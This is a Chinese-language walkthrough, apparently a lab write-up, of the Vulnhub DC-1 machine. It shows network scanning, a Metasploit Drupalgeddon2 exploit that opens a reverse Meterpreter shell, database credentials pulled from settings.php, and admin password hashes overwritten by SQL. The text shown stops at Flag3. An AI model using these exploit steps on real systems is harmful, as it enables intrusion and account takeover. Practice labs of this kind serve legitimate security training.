文章目录
- Flag1
- Flag2
- Flag3
- Flag4
- Flag5
- 总结
└─# arp-scan -l | grep 08:00:27 >> arp-scan.txt
Interface: eth0, type: EN10MB, MAC: 08:00:27:16:61:42, IPv4: 192.168.1.245
192.168.1.183 08:00:27:53:e3:e6 PCS Systemtechnik GmbH
└─# nmap -Pn -A -p- 192.168.1.183 -o nmap.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-11 14:17 CST
Nmap scan report for 192.168.1.183
Host is up (0.00021s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
| 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
| 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-generator: Drupal 7 (http://drupal.org)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 36648/tcp status
| 100024 1 47546/udp status
| 100024 1 48623/tcp6 status
|_ 100024 1 49914/udp6 status
36648/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:53:E3:E6 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE
HOP RTT ADDRESS
1 0.22 ms 192.168.1.183OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.87 seconds
发现web服务访问,可以使用Wappalyzer插件识别,也可以用kali的WhatWeb
└─# whatweb -v 192.168.1.183 >> whatweb.txt┌──(root㉿kali)-[~/Vulnhub/DC1]
└─# cat whatweb.txt
WhatWeb report for http://192.168.1.183
Status : 200 OK
Title : Welcome to Drupal Site | Drupal Site
IP : 192.168.1.183
Country : RESERVED, ZZSummary : Apache[2.2.22], Content-Language[en], Drupal, HTTPServer[Debian Linux][Apache/2.2.22 (Debian)], JQuery, MetaGenerator[Drupal 7 (http://drupal.org)], PasswordField[pass], PHP[5.4.45-0+deb7u14], Script[text/javascript], UncommonHeaders[x-generator], X-Powered-By[PHP/5.4.45-0+deb7u14]Detected Plugins:
[ Apache ]The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows NT. The goal of this project is to provide a secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards. Version : 2.2.22 (from HTTP Server Header)Google Dorks: (3)Website : http://httpd.apache.org/[ Content-Language ]Detect the content-language setting from the HTTP header. String : en[ Drupal ]Drupal is an opensource CMS written in PHP. Aggressive function available (check plugin file or details).Google Dorks: (1)Website : http://www.drupal.org[ HTTPServer ]HTTP server header string. This plugin also attempts to identify the operating system from the server header. OS : Debian LinuxString : Apache/2.2.22 (Debian) (from server string)[ JQuery ]A fast, concise, JavaScript that simplifies how to traverse HTML documents, handle events, perform animations, and add AJAX. Website : http://jquery.com/[ MetaGenerator ]This plugin identifies meta generator tags and extracts its value. String : Drupal 7 (http://drupal.org)[ PHP ]PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. This plugin identifies PHP errors, modules and versions and extracts the local file path and username if present. Version : 5.4.45-0+deb7u14Google Dorks: (2)Website : http://www.php.net/[ PasswordField ]find password fields String : pass (from field name)[ Script ]This plugin detects instances of script HTML elements and returns the script language/type. String : text/javascript[ UncommonHeaders ]Uncommon HTTP server headers. The blacklist includes all the standard headers and many non standard but common ones. Interesting but fairly common headers should have their own plugins, eg. x-powered-by, server and x-aspnet-version. Info about headers can be found at www.http-stats.com String : x-generator (from headers)[ X-Powered-By ]X-Powered-By HTTP header String : PHP/5.4.45-0+deb7u14 (from x-powered-by string)HTTP Headers:HTTP/1.1 200 OKDate: Tue, 11 Feb 2025 06:26:47 GMTServer: Apache/2.2.22 (Debian)X-Powered-By: PHP/5.4.45-0+deb7u14Expires: Sun, 19 Nov 1978 05:00:00 GMTLast-Modified: Tue, 11 Feb 2025 06:26:47 +0000Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0ETag: "1739255207"Content-Language: enX-Generator: Drupal 7 (http://drupal.org)Vary: Accept-EncodingContent-Encoding: gzipContent-Length: 2275Connection: closeContent-Type: text/html; charset=utf-8利用历史漏洞
└─# msfconsole
Metasploit tip: Use the edit command to open the currently active module
in your editor. . . dBBBBBBb dBBBP dBBBBBBP dBBBBBb . o ' dB' BBP dB'dB'dB' dBBP dBP dBP BB dB'dB'dB' dBP dBP dBP BB dB'dB'dB' dBBBBP dBP dBBBBBBB dBBBBBP dBBBBBb dBP dBBBBP dBP dBBBBBBP . . dB' dBP dB'.BP | dBP dBBBB' dBP dB'.BP dBP dBP --o-- dBP dBP dBP dB'.BP dBP dBP | dBBBBP dBP dBBBBP dBBBBP dBP dBP . . o To boldly go where no shell has gone before =[ metasploit v6.4.20-dev ]
+ -- --=[ 2440 exploits - 1256 auxiliary - 429 post ]
+ -- --=[ 1471 payloads - 47 encoders - 11 nops ]
+ -- --=[ 9 evasion ]Metasploit Documentation: https://docs.metasploit.com/msf6 > search drupalMatching Modules
================# Name Disclosure Date Rank Check Description- ---- --------------- ---- ----- -----------0 exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution1 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection2 \_ target: Automatic (PHP In-Memory) . . . .3 \_ target: Automatic (PHP Dropper) . . . .4 \_ target: Automatic (Unix In-Memory) . . . .5 \_ target: Automatic (Linux Dropper) . . . .6 \_ target: Drupal 7.x (PHP In-Memory) . . . .7 \_ target: Drupal 7.x (PHP Dropper) . . . .8 \_ target: Drupal 7.x (Unix In-Memory) . . . .9 \_ target: Drupal 7.x (Linux Dropper) . . . .10 \_ target: Drupal 8.x (PHP In-Memory) . . . .11 \_ target: Drupal 8.x (PHP Dropper) . . . .12 \_ target: Drupal 8.x (Unix In-Memory) . . . .13 \_ target: Drupal 8.x (Linux Dropper) . . . .14 \_ AKA: SA-CORE-2018-002 . . . .15 \_ AKA: Drupalgeddon 2 . . . .16 exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection17 \_ target: Drupal 7.0 - 7.31 (form-cache PHP injection method) . . . .18 \_ target: Drupal 7.0 - 7.31 (user-post PHP injection method) . . . .19 auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection20 exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution21 exploit/unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE22 \_ target: PHP In-Memory . . . .23 \_ target: Unix In-Memory . . . .24 auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration25 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code ExecutionInteract with a module by name or index. For example info 25, use 25 or use exploit/unix/webapp/php_xmlrpc_evalmsf6 > use 1
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options # no可设可不设 yes必须设置Module options (exploit/unix/webapp/drupal_drupalgeddon2):Name Current Setting Required Description---- --------------- -------- -----------DUMP_OUTPUT false no Dump payload command outputPHP_FUNC passthru yes PHP function to executeProxies no A proxy chain of format type:host:port[,type:host:port][...]RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htmlRPORT 80 yes The target port (TCP)SSL false no Negotiate SSL/TLS for outgoing connectionsTARGETURI / yes Path to Drupal installVHOST no HTTP server virtual hostPayload options (php/meterpreter/reverse_tcp):Name Current Setting Required Description---- --------------- -------- -----------LHOST 192.168.1.245 yes The listen address (an interface may be specified)LPORT 4444 yes The listen portExploit target:Id Name-- ----0 Automatic (PHP In-Memory)View the full module info with the info, or info -d command.msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.1.183
rhosts => 192.168.1.183
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options Module options (exploit/unix/webapp/drupal_drupalgeddon2):Name Current Setting Required Description---- --------------- -------- -----------DUMP_OUTPUT false no Dump payload command outputPHP_FUNC passthru yes PHP function to executeProxies no A proxy chain of format type:host:port[,type:host:port][...]RHOSTS 192.168.1.183 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htmlRPORT 80 yes The target port (TCP)SSL false no Negotiate SSL/TLS for outgoing connectionsTARGETURI / yes Path to Drupal installVHOST no HTTP server virtual hostPayload options (php/meterpreter/reverse_tcp):Name Current Setting Required Description---- --------------- -------- -----------LHOST 192.168.1.245 yes The listen address (an interface may be specified)LPORT 4444 yes The listen portExploit target:Id Name-- ----0 Automatic (PHP In-Memory)View the full module info with the info, or info -d command.msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit [*] Started reverse TCP handler on 192.168.1.245:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Sending stage (39927 bytes) to 192.168.1.183
# 出现Meterpreter session 1 opened(kali和目标ip的连接)说明攻击成功
[*] Meterpreter session 1 opened (192.168.1.245:4444 -> 192.168.1.183:55793) at 2025-02-11 14:56:20 +0800meterpreter > shell
Process 3238 created.
Channel 0 created.
whoami
www-data
python -V
Python 2.7.3
# 调整为可交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'Flag1
www-data@DC-1:/var/www$ ls
ls
COPYRIGHT.txt LICENSE.txt cron.php misc sites
INSTALL.mysql.txt MAINTAINERS.txt flag1.txt modules themes
INSTALL.pgsql.txt README.txt includes profiles update.php
INSTALL.sqlite.txt UPGRADE.txt index.php robots.txt web.config
INSTALL.txt authorize.php install.php scripts xmlrpc.php
www-data@DC-1:/var/www$ cat flag1.txt
cat flag1.txt
Every good CMS needs a config file - and so do you.
Flag2
百度Drupal配置文件,路径复杂,名称为settings.php,命令直接搜索并打开,内联执行
www-data@DC-1:/var/www$ cat `find / -name settings.php`
cat `find / -name settings.php`
<?php/**** flag2* Brute force and dictionary attacks aren't the* only ways to gain access (and you WILL need access).* What can you do with these credentials?**/$databases = array ('default' => array ('default' => array ('database' => 'drupaldb','username' => 'dbuser','password' => 'R0ck3t','host' => 'localhost','port' => '','driver' => 'mysql','prefix' => '',),),
);/*** Access control for update.php script.** If you are updating your Drupal installation using the update.php script but* are not logged in using either an account with the "Administer software* updates" permission or the site maintenance account (the account that was* created during installation), you will need to modify the access check* statement below. Change the FALSE to a TRUE to disable the access check.* After finishing the upgrade, be sure to open this file again and change the* TRUE back to a FALSE!*/
$update_free_access = FALSE;/*** Salt for one-time login links and cancel links, form tokens, etc.** This variable will be set to a random value by the installer. All one-time* login links will be invalidated if the value is changed. Note that if your* site is deployed on a cluster of web servers, you must ensure that this* variable has the same value on each server. If this variable is empty, a hash* of the serialized database credentials will be used as a fallback salt.** For enhanced security, you may set this variable to a value using the* contents of a file outside your docroot that is never saved together* with any backups of your Drupal files and database.** Example:* $drupal_hash_salt = file_get_contents('/home/example/salt.txt');**/
$drupal_hash_salt = 'X8gdX7OdYRiBnlHoj0ukhtZ7eO4EDrvMkhN21SWZocs';/*** Base URL (optional).** If Drupal is generating incorrect URLs on your site, which could* be in HTML headers (links to CSS and JS files) or visible links on pages* (such as in menus), uncomment the Base URL statement below (remove the* leading hash sign) and fill in the absolute URL to your Drupal installation.** You might also want to force users to use a given domain.* See the .htaccess file for more information.** Examples:* $base_url = 'http://www.example.com';* $base_url = 'http://www.example.com:8888';* $base_url = 'http://www.example.com/drupal';* $base_url = 'https://www.example.com:8888/drupal';** It is not allowed to have a trailing slash; Drupal will add it* for you.*/
# $base_url = 'http://www.example.com'; // NO trailing slash!/*** PHP settings:** To see what PHP settings are possible, including whether they can be set at* runtime (by using ini_set()), read the PHP documentation:* http://www.php.net/manual/en/ini.list.php* See drupal_environment_initialize() in includes/bootstrap.inc for required* runtime settings and the .htaccess file for non-runtime settings. Settings* defined there should not be duplicated here so as to avoid conflict issues.*//*** Some distributions of Linux (most notably Debian) ship their PHP* installations with garbage collection (gc) disabled. Since Drupal depends on* PHP's garbage collection for clearing sessions, ensure that garbage* collection occurs by using the most common settings.*/
ini_set('session.gc_probability', 1);
ini_set('session.gc_divisor', 100);/*** Set session lifetime (in seconds), i.e. the time from the user's last visit* to the active session may be deleted by the session garbage collector. When* a session is deleted, authenticated users are logged out, and the contents* of the user's $_SESSION variable is discarded.*/
ini_set('session.gc_maxlifetime', 200000);/*** Set session cookie lifetime (in seconds), i.e. the time from the session is* created to the cookie expires, i.e. when the browser is expected to discard* the cookie. The value 0 means "until the browser is closed".*/
ini_set('session.cookie_lifetime', 2000000);/*** If you encounter a situation where users post a large amount of text, and* the result is stripped out upon viewing but can still be edited, Drupal's* output filter may not have sufficient memory to process it. If you* experience this issue, you may wish to uncomment the following two lines* and increase the limits of these variables. For more information, see* http://php.net/manual/en/pcre.configuration.php.*/
# ini_set('pcre.backtrack_limit', 200000);
# ini_set('pcre.recursion_limit', 200000);/*** Drupal automatically generates a unique session cookie name for each site* based on its full domain name. If you have multiple domains pointing at the* same Drupal site, you can either redirect them all to a single domain (see* comment in .htaccess), or uncomment the line below and specify their shared* base domain. Doing so assures that users remain logged in as they cross* between your various domains. Make sure to always start the $cookie_domain* with a leading dot, as per RFC 2109.*/
# $cookie_domain = '.example.com';/*** Variable overrides:** To override specific entries in the 'variable' table for this site,* set them here. You usually don't need to use this feature. This is* useful in a configuration file for a vhost or directory, rather than* the default settings.php. Any configuration setting from the 'variable'* table can be given a new value. Note that any values you provide in* these variable overrides will not be modifiable from the Drupal* administration interface.** The following overrides are examples:* - site_name: Defines the site's name.* - theme_default: Defines the default theme for this site.* - anonymous: Defines the human-readable name of anonymous users.* Remove the leading hash signs to enable.*/
# $conf['site_name'] = 'My Drupal site';
# $conf['theme_default'] = 'garland';
# $conf['anonymous'] = 'Visitor';/*** A custom theme can be set for the offline page. This applies when the site* is explicitly set to maintenance mode through the administration page or when* the database is inactive due to an error. It can be set through the* 'maintenance_theme' key. The template file should also be copied into the* theme. It is located inside 'modules/system/maintenance-page.tpl.php'.* Note: This setting does not apply to installation and update pages.*/
# $conf['maintenance_theme'] = 'bartik';/*** Reverse Proxy Configuration:** Reverse proxy servers are often used to enhance the performance* of heavily visited sites and may also provide other site caching,* security, or encryption benefits. In an environment where Drupal* is behind a reverse proxy, the real IP address of the client should* be determined such that the correct client IP address is available* to Drupal's logging, statistics, and access management systems. In* the most simple scenario, the proxy server will add an* X-Forwarded-For header to the request that contains the client IP* address. However, HTTP headers are vulnerable to spoofing, where a* malicious client could bypass restrictions by setting the* X-Forwarded-For header directly. Therefore, Drupal's proxy* configuration requires the IP addresses of all remote proxies to be* specified in $conf['reverse_proxy_addresses'] to work correctly.** Enable this setting to get Drupal to determine the client IP from* the X-Forwarded-For header (or $conf['reverse_proxy_header'] if set).* If you are unsure about this setting, do not have a reverse proxy,* or Drupal operates in a shared hosting environment, this setting* should remain commented out.** In order for this setting to be used you must specify every possible* reverse proxy IP address in $conf['reverse_proxy_addresses'].* If a complete list of reverse proxies is not available in your* environment (for example, if you use a CDN) you may set the* $_SERVER['REMOTE_ADDR'] variable directly in settings.php.* Be aware, however, that it is likely that this would allow IP* address spoofing unless more advanced precautions are taken.*/
# $conf['reverse_proxy'] = TRUE;/*** Specify every reverse proxy IP address in your environment.* This setting is required if $conf['reverse_proxy'] is TRUE.*/
# $conf['reverse_proxy_addresses'] = array('a.b.c.d', ...);/*** Set this value if your proxy server sends the client IP in a header* other than X-Forwarded-For.*/
# $conf['reverse_proxy_header'] = 'HTTP_X_CLUSTER_CLIENT_IP';/*** Page caching:** By default, Drupal sends a "Vary: Cookie" HTTP header for anonymous page* views. This tells a HTTP proxy that it may return a page from its local* cache without contacting the web server, if the user sends the same Cookie* header as the user who originally requested the cached page. Without "Vary:* Cookie", authenticated users would also be served the anonymous page from* the cache. If the site has mostly anonymous users except a few known* editors/administrators, the Vary header can be omitted. This allows for* better caching in HTTP proxies (including reverse proxies), i.e. even if* clients send different cookies, they still get content served from the cache.* However, authenticated users should access the site directly (i.e. not use an* HTTP proxy, and bypass the reverse proxy if one is used) in order to avoid* getting cached pages from the proxy.*/
# $conf['omit_vary_cookie'] = TRUE;/*** CSS/JS aggregated file gzip compression:** By default, when CSS or JS aggregation and clean URLs are enabled Drupal will* store a gzip compressed (.gz) copy of the aggregated files. If this file is* available then rewrite rules in the default .htaccess file will serve these* files to browsers that accept gzip encoded content. This allows pages to load* faster for these users and has minimal impact on server load. If you are* using a webserver other than Apache httpd, or a caching reverse proxy that is* configured to cache and compress these files itself you may want to uncomment* one or both of the below lines, which will prevent gzip files being stored.*/
# $conf['css_gzip_compression'] = FALSE;
# $conf['js_gzip_compression'] = FALSE;/*** String overrides:** To override specific strings on your site with or without enabling the Locale* module, add an entry to this list. This functionality allows you to change* a small number of your site's default English language interface strings.** Remove the leading hash signs to enable.*/
# $conf['locale_custom_strings_en'][''] = array(
# 'forum' => 'Discussion board',
# '@count min' => '@count minutes',
# );/**** IP blocking:** To bypass database queries for denied IP addresses, use this setting.* Drupal queries the {blocked_ips} table by default on every page request* for both authenticated and anonymous users. This allows the system to* block IP addresses from within the administrative interface and before any* modules are loaded. However on high traffic websites you may want to avoid* this query, allowing you to bypass database access altogether for anonymous* users under certain caching configurations.** If using this setting, you will need to add back any IP addresses which* you may have blocked via the administrative interface. Each element of this* array represents a blocked IP address. Uncommenting the array and leaving it* empty will have the effect of disabling IP blocking on your site.** Remove the leading hash signs to enable.*/
# $conf['blocked_ips'] = array(
# 'a.b.c.d',
# );/*** Fast 404 pages:** Drupal can generate fully themed 404 pages. However, some of these responses* are for images or other resource files that are not displayed to the user.* This can waste bandwidth, and also generate server load.** The options below return a simple, fast 404 page for URLs matching a* specific pattern:* - 404_fast_paths_exclude: A regular expression to match paths to exclude,* such as images generated by image styles, or dynamically-resized images.* If you need to add more paths, you can add '|path' to the expression.* - 404_fast_paths: A regular expression to match paths that should return a* simple 404 page, rather than the fully themed 404 page. If you don't have* any aliases ending in htm or html you can add '|s?html?' to the expression.* - 404_fast_html: The html to return for simple 404 pages.** Add leading hash signs if you would like to disable this functionality.*/
$conf['404_fast_paths_exclude'] = '/\/(?:styles)\//';
$conf['404_fast_paths'] = '/\.(?:txt|png|gif|jpe?g|css|js|ico|swf|flv|cgi|bat|pl|dll|exe|asp)$/i';
$conf['404_fast_html'] = '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL "@path" was not found on this server.</p></body></html>';/*** By default the page request process will return a fast 404 page for missing* files if they match the regular expression set in '404_fast_paths' and not* '404_fast_paths_exclude' above. 404 errors will simultaneously be logged in* the Drupal system log.** You can choose to return a fast 404 page earlier for missing pages (as soon* as settings.php is loaded) by uncommenting the line below. This speeds up* server response time when loading 404 error pages and prevents the 404 error* from being logged in the Drupal system log. In order to prevent valid pages* such as image styles and other generated content that may match the* '404_fast_html' regular expression from returning 404 errors, it is necessary* to add them to the '404_fast_paths_exclude' regular expression above. Make* sure that you understand the effects of this feature before uncommenting the* line below.*/
# drupal_fast_404();/*** External access proxy settings:** If your site must access the Internet via a web proxy then you can enter* the proxy settings here. Currently only basic authentication is supported* by using the username and password variables. The proxy_user_agent variable* can be set to NULL for proxies that require no User-Agent header or to a* non-empty string for proxies that limit requests to a specific agent. The* proxy_exceptions variable is an array of host names to be accessed directly,* not via proxy.*/
# $conf['proxy_server'] = '';
# $conf['proxy_port'] = 8080;
# $conf['proxy_username'] = '';
# $conf['proxy_password'] = '';
# $conf['proxy_user_agent'] = '';
# $conf['proxy_exceptions'] = array('127.0.0.1', 'localhost');/*** Authorized file system operations:** The Update manager module included with Drupal provides a mechanism for* site administrators to securely install missing updates for the site* directly through the web user interface. On securely-configured servers,* the Update manager will require the administrator to provide SSH or FTP* credentials before allowing the installation to proceed; this allows the* site to update the new files as the user who owns all the Drupal files,* instead of as the user the webserver is running as. On servers where the* webserver user is itself the owner of the Drupal files, the administrator* will not be prompted for SSH or FTP credentials (note that these server* setups are common on shared hosting, but are inherently insecure).** Some sites might wish to disable the above functionality, and only update* the code directly via SSH or FTP themselves. This setting completely* disables all functionality related to these authorized file operations.** @see http://drupal.org/node/244924** Remove the leading hash signs to disable.*/
# $conf['allow_authorize_operations'] = FALSE;
数据库
ww-data@DC-1:/var/www$ mysql -udbuser -pR0ck3t
mysql -udbuser -pR0ck3t
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 97
Server version: 5.5.60-0+deb7u1 (Debian)Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.mysql> use drupaldb;show tables;
use drupaldb;show tables;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -ADatabase changed
+-----------------------------+
| Tables_in_drupaldb |
+-----------------------------+
| actions |
| authmap |
| batch |
| block |
| block_custom |
| block_node_type |
| block_role |
| blocked_ips |
| cache |
| cache_block |
| cache_bootstrap |
| cache_field |
| cache_filter |
| cache_form |
| cache_image |
| cache_menu |
| cache_page |
| cache_path |
| cache_update |
| cache_views |
| cache_views_data |
| comment |
| ctools_css_cache |
| ctools_object_cache |
| date_format_locale |
| date_format_type |
| date_formats |
| field_config |
| field_config_instance |
| field_data_body |
| field_data_comment_body |
| field_data_field_image |
| field_data_field_tags |
| field_revision_body |
| field_revision_comment_body |
| field_revision_field_image |
| field_revision_field_tags |
| file_managed |
| file_usage |
| filter |
| filter_format |
| flood |
| history |
| image_effects |
| image_styles |
| menu_custom |
| menu_links |
| menu_router |
| node |
| node_access |
| node_comment_statistics |
| node_revision |
| node_type |
| queue |
| rdf_mapping |
| registry |
| registry_file |
| role |
| role_permission |
| search_dataset |
| search_index |
| search_node_links |
| search_total |
| semaphore |
| sequences |
| sessions |
| shortcut_set |
| shortcut_set_users |
| system |
| taxonomy_index |
| taxonomy_term_data |
| taxonomy_term_hierarchy |
| taxonomy_vocabulary |
| url_alias |
| users |
| users_roles |
| variable |
| views_display |
| views_view |
| watchdog |
+-----------------------------+
80 rows in set (0.00 sec)mysql> select * from users;
select * from users;
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| uid | name | pass | mail | theme | signature | signature_format | created | access | login | status | timezone | language | picture | init | data |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| 0 | | | | | | NULL | 0 | 0 | 0 | 0 | NULL | | 0 | | NULL |
| 1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | admin@example.com | | | NULL | 1550581826 | 1550583852 | 1550582362 | 1 | Australia/Melbourne | | 0 | admin@example.com | b:0; |
| 2 | Fred | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | fred@example.org | | | filtered_html | 1550581952 | 1550582225 | 1550582225 | 1 | Australia/Melbourne | | 0 | fred@example.org | b:0; |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
搜索引擎收集方法
https://drupalchina.cn/node/2128由 [东方龙马](https://drupalchina.cn/users/dong-fang-long-ma "查看用户资料。") 提交于 29 October 2013问:忘记了Druapl7的密码,该如何解决?答:**方法一**:可以新注册一个用户,密码记住了,然后通过phpmyadmin这样的可视化mysql管理工具到users表里把加密后的密码拷到admin的密码里。**方法二**:这是drupal提供的最原生的方法在windows下,打开命令行客户端(cmd),切换到Drupal7项目所在的目录,敲入以下命令:php scripts/password-hash.sh admin输出:password: admin hash: $S$DMtruNEVmqWoqhlPwTlnFzwyBRFgQwXUfppe9pW1RqqXlMy97tzA然后到数据库中,查users表,找到对应的用户名,修改密码,将上述的hash值复制到密码字段,保存即可。
www-data@DC-1:/var/www$ find -name 'password-hash.sh'
find -name 'password-hash.sh'
./scripts/password-hash.sh# 看一下使用方法
www-data@DC-1:/var/www$ cat ./scripts/password-hash.sh
cat ./scripts/password-hash.sh
#!/usr/bin/php
<?php/*** Drupal hash script - to generate a hash from a plaintext password** Check for your PHP interpreter - on Windows you'll probably have to* replace line 1 with* #!c:/program files/php/php.exe** @param password1 [password2 [password3 ...]]* Plain-text passwords in quotes (or with spaces backslash escaped).*/if (version_compare(PHP_VERSION, "5.2.0", "<")) {$version = PHP_VERSION;echo <<<EOFERROR: This script requires at least PHP version 5.2.0. You invoked it withPHP version {$version}.
\n
EOF;exit;
}$script = basename(array_shift($_SERVER['argv']));if (in_array('--help', $_SERVER['argv']) || empty($_SERVER['argv'])) {echo <<<EOFGenerate Drupal password hashes from the shell.Usage: {$script} [OPTIONS] "<plan-text password>"
Example: {$script} "mynewpassword"All arguments are long options.--help Print this page.--root <path>Set the working directory for the script to the specified path.To execute this script this has to be the root directory of yourDrupal installation, e.g. /home/www/foo/drupal (assuming Drupalrunning on Unix). Use surrounding quotation marks on Windows."<password1>" ["<password2>" ["<password3>" ...]]One or more plan-text passwords enclosed by double quotes. Theoutput hash may be manually entered into the {users}.pass field tochange a password via SQL to a known value.To run this script without the --root argument invoke it from the root directory
of your Drupal installation as./scripts/{$script}
\n
EOF;exit;
}$passwords = array();// Parse invocation arguments.
while ($param = array_shift($_SERVER['argv'])) {switch ($param) {case '--root':// Change the working directory.$path = array_shift($_SERVER['argv']);if (is_dir($path)) {chdir($path);}break;default:// Add a password to the list to be processed.$passwords[] = $param;break;}
}define('DRUPAL_ROOT', getcwd());include_once DRUPAL_ROOT . '/includes/password.inc';
include_once DRUPAL_ROOT . '/includes/bootstrap.inc';foreach ($passwords as $password) {print("\npassword: $password \t\thash: ". user_hash_password($password) ."\n");
}
print("\n");
得到密码哈希
www-data@DC-1:/var/www$ php ./scripts/password-hash.sh admin123
php ./scripts/password-hash.sh admin123password: admin123 hash: $S$DQzdwU7zlyiorCqNldghxrF2To6lgHhfnpZpr1SCIw8YBZN8PZFx
修改
mysql> update users set pass="$S$DQzdwU7zlyiorCqNldghxrF2To6lgHhfnpZpr1SCIw8YBZN8PZFx" where name= 'admin' or name = 'Fred';
<xrF2To6lgHhfnpZpr1SCIw8YBZN8PZFx" where name= 'admin' or name = 'Fred';
Query OK, 2 rows affected (0.01 sec)
Rows matched: 2 Changed: 2 Warnings: 0mysql> select * from users;
select * from users;
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| uid | name | pass | mail | theme | signature | signature_format | created | access | login | status | timezone | language | picture | init | data |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| 0 | | | | | | NULL | 0 | 0 | 0 | 0 | NULL | | 0 | | NULL |
| 1 | admin | $S$DQzdwU7zlyiorCqNldghxrF2To6lgHhfnpZpr1SCIw8YBZN8PZFx | admin@example.com | | | NULL | 1550581826 | 1550583852 | 1550582362 | 1 | Australia/Melbourne | | 0 | admin@example.com | b:0; |
| 2 | Fred | $S$DQzdwU7zlyiorCqNldghxrF2To6lgHhfnpZpr1SCIw8YBZN8PZFx | fred@example.org | | | filtered_html | 1550581952 | 1550582225 | 1550582225 | 1 | Australia/Melbourne | | 0 | fred@example.org | b:0; |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
3 rows in set (0.00 sec)
Flag3
web端登录后点击左上角Dashboard便可以看见flag3
# flag3## Primary tabs- [View(active tab)](http://192.168.1.183/node/2)
- [Edit](http://192.168.1.183/node/2/edit)# 提示了passwd和shadow,linux的文件Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
www-data@DC-1:/var/www$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
